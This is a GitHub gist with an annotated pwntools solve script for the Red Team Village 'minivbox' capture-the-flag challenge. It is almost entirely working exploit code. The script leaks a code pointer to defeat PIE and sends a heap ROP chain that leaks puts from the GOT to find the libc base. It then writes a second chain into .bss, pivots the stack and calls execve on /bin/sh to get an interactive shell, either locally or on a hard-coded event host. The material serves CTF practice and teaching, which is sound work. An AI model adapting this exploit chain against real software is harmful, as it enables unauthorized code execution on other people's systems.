@MEhrn00
Created August 24, 2021 16:37
Red Team Village minivbox solve script
#!/usr/bin/env python3
"""Red Team Village "minivbox" CTF solve script (pwntools).

Drives the target's "> " menu over a pwntools tube, derives the binary
base from a leaked pointer into `handle_read`, then builds a ROP chain
that is first placed on the heap (to leak `puts` and compute the libc
base) and finally a second chain in .bss.  The original author's comments
name the menu actions they rely on: option 3 sets a size (followed by the
number), option 2 is followed by data, option 4 resets; what option 1
does is not stated here.

Everything below is tied to the exact `./target` and `./libc-2.31.so`
builds the script was written against: the symbol names (`handle_read`,
`stripped_read`), the `BSS` constant and the three raw `e.address + 0x...`
offsets are build-specific and will not transfer to another binary.

Run locally with the bundled libc via LD_PRELOAD, with `REMOTE=1` to use
the hard-coded CTF host/port, and `GDB=1` to attach a debugger locally.
"""
from pwn import *
from time import sleep  # NOTE(review): unused in this script
context.binary = binary = './target'
if args.REMOTE:
    # Hard-coded event host/port; only meaningful while the CTF is live.
    p = remote('pwnremote.threatsims.com', 9003)
    libc = ELF('./libc-2.31.so', checksec = False)
else:
    # Preload the bundled libc so local offsets match the remote build.
    p = process(binary, env = {'LD_PRELOAD': './libc-2.31.so'})
    libc = ELF('./libc-2.31.so', checksec = False)
if args.GDB:
    gdb.attach(p)
e = ELF(binary, checksec = False)
# Set size to 24
p.sendlineafter('> ', '3')
p.sendline('24')
p.sendlineafter('> ', '2')
p.sendline('A')
p.sendlineafter('> ', '1')
# Set size to 16
p.sendlineafter('> ', '3')
p.sendline('16')
p.sendlineafter('> ', '1')
# Get leak
# The first 8 bytes of the response are discarded; the next 8 are read as a
# little-endian pointer into handle_read, so subtracting the symbol offset
# gives the (PIE) load address of the binary.
p.recv(8)
e.address = u64(p.recv(8)) - e.symbols.handle_read
log.info(f'Binary base => {hex(e.address)}')
rop = ROP(e, checksec = False)
# Set size to 8
p.sendlineafter('> ', '3')
p.sendline('8')
p.sendlineafter('> ', '1')
# Offset from the binary base used as a scratch area for the second chain
# (presumably in .bss, per the name) — build-specific constant.
BSS = 0x53c0
# Heap rop chain to leak libc and write bss rop chain
# Each `pop rdi; ret` / stripped_read pair points rdi at one slot of the
# scratch area; the trailing comments name what the "Write bss rop chain"
# section below later stores in that slot.  The chain ends by pivoting rbp
# to just below the scratch area and executing `leave; ret` into it.
chain = [
    p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
    p64(e.got.puts),
    p64(e.plt.puts),
    p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
    p64(e.address + BSS), # pop rdi; ret
    p64(e.symbols.stripped_read),
    p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
    p64(e.address + BSS + 0x8), # /bin/sh
    p64(e.symbols.stripped_read),
    p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
    p64(e.address + BSS + 0x10), # pop rsi; ret
    p64(e.symbols.stripped_read),
    p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
    p64(e.address + BSS + 0x20), # pop rdx; pop rbx; ret
    p64(e.symbols.stripped_read),
    p64(rop.find_gadget(['pop rdi', 'ret'])[0]),
    p64(e.address + BSS + 0x38), # execve
    p64(e.symbols.stripped_read),
    p64(rop.find_gadget(['pop rbp', 'ret'])[0]),
    p64(e.address + BSS - 8),
    p64(rop.find_gadget(['leave', 'ret'])[0])
]
# Only the low 6 bytes of each 8-byte entry are sent (the two high bytes
# are dropped by `[:-2]`).  The prompt here is '>' rather than '> ' as
# elsewhere; sendlineafter matches the shorter prefix, so it still syncs.
for i in chain:
    p.sendlineafter('>', '1')
    p.sendlineafter('>', '2')
    p.sendline(i[:-2])
# Reset
p.sendlineafter('> ', '4')
# Set size to 8
p.sendlineafter('> ', '3')
p.sendline('8')
p.sendlineafter('> ', '1')
# Set size to 6
p.sendlineafter('> ', '3')
p.sendline('6')
p.sendlineafter('> ', '2')
# Raw offsets into the binary (not resolved through ROP or symbols) —
# build-specific; the author labels the first one as the pivot.
p.sendline(p64(e.address + 0x001687)[:-2]) # pivot
p.sendlineafter('> ', '3')
p.sendline('8')
p.sendlineafter('> ', '1')
p.sendlineafter('> ', '2')
p.sendline(p64(e.address + 0x0016f4)[:-2])
p.sendlineafter('> ', '1')
p.sendlineafter('> ', '1')
p.sendlineafter('> ', '3')
p.sendline('6')
p.sendlineafter('> ', '2')
p.sendline(p64(e.address + 0x000127a)[:-2])
p.sendlineafter('> ', '1')
# puts() prints the leaked GOT entry as raw bytes; pad it back to 8 bytes
# before unpacking and derive the libc base from libc's own puts offset.
leak = u64(p.recvline().strip().ljust(8, b'\0'))
libc.address = leak - libc.symbols.puts
log.info(f'Leaked puts => {hex(leak)}')
log.info(f'Libc base => {hex(libc.address)}')
lrop = ROP(libc)
# Write bss rop chain
# One 8-byte value per stripped_read call in the heap chain, in slot order.
# Each value is followed by an empty line — presumably consumed by the
# target's read routine between slots; TODO confirm against the binary.
p.sendline(p64(rop.find_gadget(['pop rdi', 'ret'])[0]))
p.sendline()
p.sendline(p64(next(libc.search(b'/bin/sh'))))
p.sendline()
p.sendline(p64(lrop.find_gadget(['pop rsi', 'ret'])[0]))
p.sendline()
p.sendline(p64(lrop.find_gadget(['pop rdx', 'pop rbx', 'ret'])[0]))
p.sendline()
p.sendline(p64(libc.symbols.execve))
p.sendline()
# Hand the tube over to the user once the chain has been delivered.
p.interactive()